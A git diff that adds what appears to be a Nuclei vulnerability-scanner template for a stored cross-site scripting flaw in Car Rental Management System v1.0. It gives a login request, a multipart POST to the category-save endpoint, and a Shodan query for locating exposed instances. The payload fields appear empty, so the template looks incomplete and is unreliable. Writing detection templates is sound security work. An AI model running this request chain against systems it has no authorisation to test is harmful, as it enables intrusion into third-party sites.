diff --git a/vulnerabilities/other/carrental-xss.yaml b/vulnerabilities/other/carrental-xss.yaml
new file mode 100644
index 0000000000..9ac8cdf663
--- /dev/null
+++ b/vulnerabilities/other/carrental-xss.yaml
@@ -0,0 +1,66 @@
+id: carrental-xss
+
+info:
+ name: Car Rental Management System v1.0 - Stored Cross Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ Car Rental Management System v1.0 is vulnerable to Cross Site Scripting via admin/ajax.php?action=save_category in Name and Description Parameter.
+ reference:
+ - https://www.exploit-db.com/exploits/49546
+ - https://www.sourcecodester.com/
+ metadata:
+ verified: true
+ shodan-query: http.html:"Car Rental Management System"
+ tags: xss,cms,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /admin/ajax.php?action=login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ username={{username}}&password={{password}}
+
+ - |
+ POST /admin/ajax.php?action=save_category HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCMJ5bh3B6m9767Em
+
+ ------WebKitFormBoundaryCMJ5bh3B6m9767Em
+ Content-Disposition: form-data; name="id"
+
+
+ ------WebKitFormBoundaryCMJ5bh3B6m9767Em
+ Content-Disposition: form-data; name="name"
+
+
+ ------WebKitFormBoundaryCMJ5bh3B6m9767Em
+ Content-Disposition: form-data; name="description"
+
+
+ ------WebKitFormBoundaryCMJ5bh3B6m9767Em--
+
+ - |
+ GET /admin/index.php?page=categories HTTP/1.1
+ Host: {{Hostname}}
+
+ redirects: true
+ max-redirects: 2
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Name: '
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200